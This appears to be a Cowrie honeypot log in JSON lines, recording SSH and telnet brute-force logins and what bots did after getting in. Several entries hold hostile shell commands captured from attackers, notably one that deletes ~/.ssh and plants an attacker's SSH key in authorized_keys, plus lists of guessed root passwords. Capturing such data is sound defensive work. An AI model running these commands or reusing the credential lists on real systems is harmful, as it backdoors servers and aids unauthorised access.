{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T17:39:51.050878Z","src_ip":"45.88.8.186","session":"1ba52371f501"}
{"eventid":"cowrie.login.success","username":"root","password":"QWE!@#123","message":"login attempt [root/QWE!@#123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T17:39:53.616689Z","src_ip":"45.88.8.186","session":"1ba52371f501"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:39:54.269086Z","src_ip":"45.88.8.186","session":"1ba52371f501"}
{"eventid":"cowrie.session.connect","src_ip":"194.164.107.6","src_port":48578,"dst_ip":"1.2.3.4","dst_port":23,"session":"a47f8308f238","protocol":"telnet","message":"New connection: 194.164.107.6:48578 (1.2.3.4:23) [session: a47f8308f238]","sensor":"my-vps","timestamp":"2025-08-26T17:43:38.578122Z"}
{"eventid":"cowrie.session.closed","duration":10.16758942604065,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:43:48.745632Z","src_ip":"194.164.107.6","session":"a47f8308f238"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":60790,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d7233299556","protocol":"ssh","message":"New connection: 45.88.8.215:60790 (1.2.3.4:22) [session: 5d7233299556]","sensor":"my-vps","timestamp":"2025-08-26T17:43:51.954338Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T17:43:52.308108Z","src_ip":"45.88.8.215","session":"5d7233299556"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T17:43:52.308798Z","src_ip":"45.88.8.215","session":"5d7233299556"}
{"eventid":"cowrie.login.success","username":"root","password":"Nehal@123","message":"login attempt [root/Nehal@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T17:43:54.098338Z","src_ip":"45.88.8.215","session":"5d7233299556"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:43:54.514621Z","src_ip":"45.88.8.215","session":"5d7233299556"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53600,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe0e00b44c00","protocol":"ssh","message":"New connection: 217.72.205.35:53600 (1.2.3.4:22) [session: fe0e00b44c00]","sensor":"my-vps","timestamp":"2025-08-26T17:45:01.018152Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:45:01.019324Z","src_ip":"217.72.205.35","session":"fe0e00b44c00"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57451,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1433c9e4459","protocol":"ssh","message":"New connection: 212.227.235.229:57451 (1.2.3.4:22) [session: c1433c9e4459]","sensor":"my-vps","timestamp":"2025-08-26T17:45:42.550126Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T17:45:42.551169Z","src_ip":"212.227.235.229","session":"c1433c9e4459"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T17:45:42.747107Z","src_ip":"212.227.235.229","session":"c1433c9e4459"}
{"eventid":"cowrie.login.success","username":"root","password":"123QWEasd!@#","message":"login attempt [root/123QWEasd!@#] succeeded","sensor":"my-vps","timestamp":"2025-08-26T17:45:43.575229Z","src_ip":"212.227.235.229","session":"c1433c9e4459"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T17:45:44.038891Z","src_ip":"212.227.235.229","session":"c1433c9e4459"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T17:45:44.039729Z","src_ip":"212.227.235.229","session":"c1433c9e4459"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T17:45:44.040712Z","src_ip":"212.227.235.229","session":"c1433c9e4459"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:45:44.237814Z","src_ip":"212.227.235.229","session":"c1433c9e4459"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T17:45:44.648219Z","src_ip":"212.227.235.229","session":"c1433c9e4459"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T17:45:44.649067Z","src_ip":"212.227.235.229","session":"c1433c9e4459"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T17:45:44.847253Z","src_ip":"212.227.235.229","session":"c1433c9e4459"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:45:44.848193Z","src_ip":"212.227.235.229","session":"c1433c9e4459"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57822,"dst_ip":"1.2.3.4","dst_port":22,"session":"866d652a93ae","protocol":"ssh","message":"New connection: 212.227.235.229:57822 (1.2.3.4:22) [session: 866d652a93ae]","sensor":"my-vps","timestamp":"2025-08-26T17:45:45.039739Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T17:45:45.040410Z","src_ip":"212.227.235.229","session":"866d652a93ae"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T17:45:45.234927Z","src_ip":"212.227.235.229","session":"866d652a93ae"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T17:45:46.061259Z","src_ip":"212.227.235.229","session":"866d652a93ae"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:45:47.258874Z","src_ip":"212.227.235.229","session":"866d652a93ae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58194,"dst_ip":"1.2.3.4","dst_port":22,"session":"29406d2f494e","protocol":"ssh","message":"New connection: 212.227.235.229:58194 (1.2.3.4:22) [session: 29406d2f494e]","sensor":"my-vps","timestamp":"2025-08-26T17:45:47.434650Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T17:45:47.435928Z","src_ip":"212.227.235.229","session":"29406d2f494e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T17:45:47.612792Z","src_ip":"212.227.235.229","session":"29406d2f494e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T17:45:48.364503Z","src_ip":"212.227.235.229","session":"29406d2f494e"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:45:48.543055Z","src_ip":"212.227.235.229","session":"29406d2f494e"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:45:48.544298Z","src_ip":"212.227.235.229","session":"c1433c9e4459"}
{"eventid":"cowrie.session.connect","src_ip":"121.162.36.56","src_port":36703,"dst_ip":"1.2.3.4","dst_port":23,"session":"0f32282fee38","protocol":"telnet","message":"New connection: 121.162.36.56:36703 (1.2.3.4:23) [session: 0f32282fee38]","sensor":"my-vps","timestamp":"2025-08-26T17:50:08.477937Z"}
{"eventid":"cowrie.session.connect","src_ip":"123.31.39.100","src_port":51393,"dst_ip":"1.2.3.4","dst_port":23,"session":"2af7074cfd28","protocol":"telnet","message":"New connection: 123.31.39.100:51393 (1.2.3.4:23) [session: 2af7074cfd28]","sensor":"my-vps","timestamp":"2025-08-26T17:50:10.027121Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57103,"dst_ip":"1.2.3.4","dst_port":23,"session":"e4650da2219c","protocol":"telnet","message":"New connection: 212.227.125.160:57103 (1.2.3.4:23) [session: e4650da2219c]","sensor":"my-vps","timestamp":"2025-08-26T17:50:11.046810Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50837,"dst_ip":"1.2.3.4","dst_port":23,"session":"309bd3f72ef9","protocol":"telnet","message":"New connection: 212.227.235.229:50837 (1.2.3.4:23) [session: 309bd3f72ef9]","sensor":"my-vps","timestamp":"2025-08-26T17:50:11.063305Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":1642,"dst_ip":"1.2.3.4","dst_port":22,"session":"773a52ce44e1","protocol":"ssh","message":"New connection: 212.227.125.160:1642 (1.2.3.4:22) [session: 773a52ce44e1]","sensor":"my-vps","timestamp":"2025-08-26T17:50:13.190636Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:50:13.192743Z","src_ip":"212.227.125.160","session":"773a52ce44e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":1903,"dst_ip":"1.2.3.4","dst_port":22,"session":"49bb9ceaed04","protocol":"ssh","message":"New connection: 212.227.125.160:1903 (1.2.3.4:22) [session: 49bb9ceaed04]","sensor":"my-vps","timestamp":"2025-08-26T17:50:13.301153Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T17:50:13.302144Z","src_ip":"212.227.125.160","session":"49bb9ceaed04"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T17:50:13.415471Z","src_ip":"212.227.125.160","session":"49bb9ceaed04"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T17:50:13.756132Z","src_ip":"212.227.125.160","session":"49bb9ceaed04"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T17:50:13.870239Z","session":"49bb9ceaed04"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47144,"dst_ip":"1.2.3.4","dst_port":23,"session":"21e9ab848f30","protocol":"telnet","message":"New connection: 212.227.235.229:47144 (1.2.3.4:23) [session: 21e9ab848f30]","sensor":"my-vps","timestamp":"2025-08-26T17:50:22.009624Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-26T17:50:22.200518Z","src_ip":"212.227.235.229","session":"21e9ab848f30"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T17:50:22.256167Z","src_ip":"212.227.235.229","session":"21e9ab848f30"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-26T17:50:22.257404Z","src_ip":"212.227.235.229","session":"21e9ab848f30"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-26T17:50:22.258307Z","src_ip":"212.227.235.229","session":"21e9ab848f30"}
{"eventid":"cowrie.session.closed","duration":31.549588203430176,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:50:40.027452Z","src_ip":"121.162.36.56","session":"0f32282fee38"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40825,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d1f90fe5c7e","protocol":"ssh","message":"New connection: 212.227.235.229:40825 (1.2.3.4:22) [session: 6d1f90fe5c7e]","sensor":"my-vps","timestamp":"2025-08-26T17:50:46.173817Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T17:50:46.176242Z","src_ip":"212.227.235.229","session":"6d1f90fe5c7e"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T17:50:46.304732Z","src_ip":"212.227.235.229","session":"6d1f90fe5c7e"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt12345","message":"login attempt [ubnt/ubnt12345] failed","sensor":"my-vps","timestamp":"2025-08-26T17:50:46.860842Z","src_ip":"212.227.235.229","session":"6d1f90fe5c7e"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt@123","message":"login attempt [ubnt/ubnt@123] failed","sensor":"my-vps","timestamp":"2025-08-26T17:50:47.992461Z","src_ip":"212.227.235.229","session":"6d1f90fe5c7e"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"q1w2e3r4t5","message":"login attempt [ubnt/q1w2e3r4t5] failed","sensor":"my-vps","timestamp":"2025-08-26T17:50:49.123379Z","src_ip":"212.227.235.229","session":"6d1f90fe5c7e"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"admin1","message":"login attempt [ubnt/admin1] failed","sensor":"my-vps","timestamp":"2025-08-26T17:50:50.256874Z","src_ip":"212.227.235.229","session":"6d1f90fe5c7e"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"123456","message":"login attempt [ubnt/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T17:50:51.389964Z","src_ip":"212.227.235.229","session":"6d1f90fe5c7e"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:50:52.521189Z","src_ip":"212.227.235.229","session":"6d1f90fe5c7e"}
